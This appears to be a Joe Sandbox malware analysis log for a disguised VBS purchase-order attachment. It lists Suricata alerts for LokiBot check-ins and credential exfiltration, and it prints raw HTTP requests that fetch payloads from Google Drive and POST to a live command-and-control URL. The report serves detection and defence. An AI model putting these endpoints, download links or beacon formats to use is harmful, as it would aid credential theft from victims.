                2024-10-01T07:44:00.486167+020020243181Malware Command and Control Activity Detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:44:03.214345+020020243181Malware Command and Control Activity Detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:44:06.087551+020020243181Malware Command and Control Activity Detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:44:08.879359+020020243181Malware Command and Control Activity Detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:44:11.705337+020020243181Malware Command and Control Activity Detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:44:15.545751+020020243181Malware Command and Control Activity Detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:44:18.317194+020020243181Malware Command and Control Activity Detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:44:21.054335+020020243181Malware Command and Control Activity Detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:44:23.780395+020020243181Malware Command and Control Activity Detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:44:26.561735+020020243181Malware Command and Control Activity Detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:44:29.245863+020020243181Malware Command and Control Activity Detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:44:31.998664+020020243181Malware Command and Control Activity Detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:44:34.719619+020020243181Malware Command and Control Activity Detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:44:37.488199+020020243181Malware Command and Control Activity Detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:44:40.272417+020020243181Malware Command and Control Activity Detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:44:43.361554+020020243181Malware Command and Control Activity Detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:44:46.086297+020020243181Malware Command and Control Activity Detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:44:48.810480+020020243181Malware Command and Control Activity Detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:44:51.554232+020020243181Malware Command and Control Activity Detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:44:54.256457+020020243181Malware Command and Control Activity Detected192.168.2.549745137.184.191.21580TCP
                2024-10-01T07:44:57.002316+020020243181Malware Command and Control Activity Detected192.168.2.549746137.184.191.21580TCP
                2024-10-01T07:44:59.702074+020020243181Malware Command and Control Activity Detected192.168.2.549747137.184.191.21580TCP
                2024-10-01T07:45:02.415633+020020243181Malware Command and Control Activity Detected192.168.2.549748137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:34.551355+020020216411A Network Trojan was detected192.168.2.549716137.184.191.21580TCP
                2024-10-01T07:43:37.322517+020020216411A Network Trojan was detected192.168.2.549717137.184.191.21580TCP
                2024-10-01T07:43:40.185853+020020216411A Network Trojan was detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:43:43.003130+020020216411A Network Trojan was detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:43:45.741448+020020216411A Network Trojan was detected192.168.2.549720137.184.191.21580TCP
                2024-10-01T07:43:48.572785+020020216411A Network Trojan was detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:43:51.351558+020020216411A Network Trojan was detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:43:54.132906+020020216411A Network Trojan was detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:43:57.879403+020020216411A Network Trojan was detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:44:00.649720+020020216411A Network Trojan was detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:44:03.369738+020020216411A Network Trojan was detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:44:06.239645+020020216411A Network Trojan was detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:44:09.041359+020020216411A Network Trojan was detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:44:11.889231+020020216411A Network Trojan was detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:44:15.693620+020020216411A Network Trojan was detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:44:18.475108+020020216411A Network Trojan was detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:44:21.209924+020020216411A Network Trojan was detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:44:23.931600+020020216411A Network Trojan was detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:44:26.709116+020020216411A Network Trojan was detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:44:29.403730+020020216411A Network Trojan was detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:44:32.156332+020020216411A Network Trojan was detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:44:34.894944+020020216411A Network Trojan was detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:44:37.656693+020020216411A Network Trojan was detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:44:40.680871+020020216411A Network Trojan was detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:44:43.545598+020020216411A Network Trojan was detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:44:46.240169+020020216411A Network Trojan was detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:44:48.957161+020020216411A Network Trojan was detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:44:51.716387+020020216411A Network Trojan was detected192.168.2.549745137.184.191.21580TCP
                2024-10-01T07:44:54.419846+020020216411A Network Trojan was detected192.168.2.549746137.184.191.21580TCP
                2024-10-01T07:44:57.163238+020020216411A Network Trojan was detected192.168.2.549747137.184.191.21580TCP
                2024-10-01T07:44:59.847504+020020216411A Network Trojan was detected192.168.2.549748137.184.191.21580TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-01T07:43:30.047966+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49714 | 142.250.184.238 | 443 | TCP


                AV Detection

                Source: http://137.184.191.215/index.php/check.php?s=am9ntjjw Virustotal: Detection: 14%
                Source: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs Virustotal: Detection: 12%
                Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.3% probability
                Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3049164389.000000000704D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49745 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49744 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49743 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49740 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49748 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49742 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Joe Sandbox View, IP Address: 137.184.191.215
                Source: Joe Sandbox View, ASN Name: PANDGUS
                Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49714 -> 142.250.184.238:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknownHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjw
